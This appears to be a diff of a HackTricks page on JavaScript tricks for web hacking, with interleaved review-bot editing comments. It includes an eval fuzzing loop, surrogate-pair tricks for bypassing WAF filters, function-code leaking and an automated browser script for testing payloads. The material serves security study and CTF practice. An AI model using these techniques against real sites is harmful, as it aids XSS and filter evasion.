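Review bot: the attribution comment `//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z` appears both inside the loop body (just before `console.log(err,cmd);`) and after the closing braces; keep only the trailing one. The `continue` inside the `catch` block is the only one without a trailing semicolon. The unchanged line above the loop also has two typos: "must to be at the beggining of the line" should read "must be at the beginning of the line".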
@ -69,7 +64,7 @@ String.fromCharCode(13) //0x0d
|
|||
String.fromCharCode(8232) //0xe2 0x80 0xa8
|
||||
String.fromCharCode(8233) //0xe2 0x80 0xa8
|
||||
|
||||
for (let j = 0; j < 65536; j++) {
|
||||
for (let j = 0; j < 65536; j++) {
|
||||
try {
|
||||
var cmd = '"aaaaa";'+String.fromCharCode(j) + '-->a.orange.ctf"';
|
||||
eval(cmd);
|
||||
|
@ -80,11 +75,11 @@ String.fromCharCode(8233) //0xe2 0x80 0xa8
|
|||
err = e.toString().split('\n')[0]
|
||||
}
|
||||
console.log(`[${err}]`,j,cmd);
|
||||
}
|
||||
}
|
||||
//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
|
||||
```
|
||||
|
||||
## **Surrogate Pairs BF**
|
||||
### **Surrogate Pairs BF**
|
||||
|
||||
This technique won't be very useful for XSS but it could be useful to bypass WAF protections. This python code receive as input 2bytes and it search a surrogate pairs that have the first byte as the the last bytes of the High surrogate pair and the the last byte as the last byte of the low surrogate pair.
|
||||
|
||||
|
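Review bot: while the heading is being demoted, the paragraph under it needs the same attention: "This python code receive as input 2bytes and it search a surrogate pairs that have the first byte as the the last bytes of the High surrogate pair and the the last byte as the last byte of the low surrogate pair" should read "This Python code takes 2 bytes as input and searches for a surrogate pair whose high surrogate ends with the first byte and whose low surrogate ends with the second byte".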
@ -104,22 +99,58 @@ More info:
|
|||
* [https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md](https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md)
|
||||
* [https://mathiasbynens.be/notes/javascript-unicode](https://mathiasbynens.be/notes/javascript-unicode) [https://mathiasbynens.be/notes/javascript-encoding](https://mathiasbynens.be/notes/javascript-encoding)
|
||||
|
||||
# **.map js files**
|
||||
## **.map js files**
|
||||
|
||||
* Trick to download .map js files: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7)
|
||||
* You can use this tool to analyze these files [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji)
|
||||
|
||||
# "--" Assignment
|
||||
## "--" Assignment
|
||||
|
||||
The decrement operator `--` is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to `NaN`. This can be used to **remove the content of variables from the environment**.
|
||||
The decrement operator `--` is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to `NaN`. This can be used to **remove the content of variables from the environment**.
|
||||
|
||||
![](<../../.gitbook/assets/image (553).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (554).png>)
|
||||
|
||||
# Functions Tricks
|
||||
## Functions Tricks
|
||||
|
||||
## Arrow functions
|
||||
### .call and .apply
|
||||
|
||||
The **`.call`** method of a function is used to **run the function**.\
|
||||
The **first argument** it expects by default is the **value of `this`** and if **nothing** is provided, **`window`** will be that value (unless **`strict mode`** is used).
|
||||
|
||||
```javascript
|
||||
function test_call(){
|
||||
console.log(this.value); //baz
|
||||
}
|
||||
new_this={value:"hey!"}
|
||||
test_call.call(new_this);
|
||||
|
||||
// To pass more arguments, just pass then inside .call()
|
||||
function test_call() {
|
||||
console.log(arguments[0]); //"arg1"
|
||||
console.log(arguments[1]); //"arg2"
|
||||
console.log(this); //[object Window]
|
||||
}
|
||||
test_call.call(null, "arg1", "arg2")
|
||||
|
||||
// If you use the "use strict" directive "this" will be null instead of window:
|
||||
function test_call() {
|
||||
"use strict";
|
||||
console.log(this); //null
|
||||
}
|
||||
test_call.call(null)
|
||||
|
||||
//The apply function is pretty much exactly the same as the call function with one important difference, you can supply an array of arguments in the second argument:
|
||||
function test_apply() {
|
||||
console.log(arguments[0]); //"arg1"
|
||||
console.log(arguments[1]); //"arg2"
|
||||
console.log(this); //[object Window]
|
||||
}
|
||||
test_apply.apply(null, ["arg1", "arg2"])
|
||||
```
|
||||
|
||||
### Arrow functions
|
||||
|
||||
Arrow functions allow you to generate functions in a single line more easily (if you understand them)
|
||||
|
||||
|
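Review bot: in the first `test_call` example the comment `//baz` does not match the code: `new_this={value:"hey!"}`, so `this.value` logs `"hey!"`. `test_call` is also declared three times in one block, so in a real file the later declarations overwrite the earlier ones; giving each example its own name keeps the block runnable end to end. "pass then inside .call()" should be "pass them", and "asignment" in the `--` paragraph should be "assignment". The prose claim that `window` is the default `this` is right for sloppy-mode code in a browser; outside a browser it is the global object (`globalThis`), which is worth a parenthetical since the `"use strict"` example relies on the distinction.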
@ -156,7 +187,7 @@ function plusone (a){ return a + 1; }
|
|||
plusone = a => a + 100;
|
||||
```
|
||||
|
||||
## Bind function
|
||||
### Bind function
|
||||
|
||||
The bind function allow to create a **copy** of a **function modifying** the **`this`** object and the **parameters** given.
|
||||
|
||||
|
@ -188,7 +219,7 @@ bindFn_change('Hello', 'World')
|
|||
Note that using **`bind`** you can manipulate the **`this`** object that is going to be used when calling the function.
|
||||
{% endhint %}
|
||||
|
||||
## Function code leak
|
||||
### Function code leak
|
||||
|
||||
If you can **access the object** of a function you can **get the code** of that function
|
||||
|
||||
|
@ -219,7 +250,7 @@ Some **random** ways to **extract the code** of a function (even comments) from
|
|||
(u=>_=>(String(u)))(_=>{ /* Hidden commment */ })()
|
||||
```
|
||||
|
||||
# Breakpoint on access to value
|
||||
## Breakpoint on access to value
|
||||
|
||||
```javascript
|
||||
// Stop when a property in sessionStorage or localStorage is set/get
|
||||
|
@ -262,7 +293,7 @@ function debugAccess(obj, prop, debugGet=true){
|
|||
debugAccess(Object.prototype, 'ppmap')
|
||||
```
|
||||
|
||||
# Automatic Browser Access to test payloads
|
||||
## Automatic Browser Access to test payloads
|
||||
|
||||
```javascript
|
||||
//Taken from https://github.com/svennergr/writeups/blob/master/inti/0621/README.md
|
||||
|
@ -304,21 +335,14 @@ async function sleep(ms) {
|
|||
})();
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|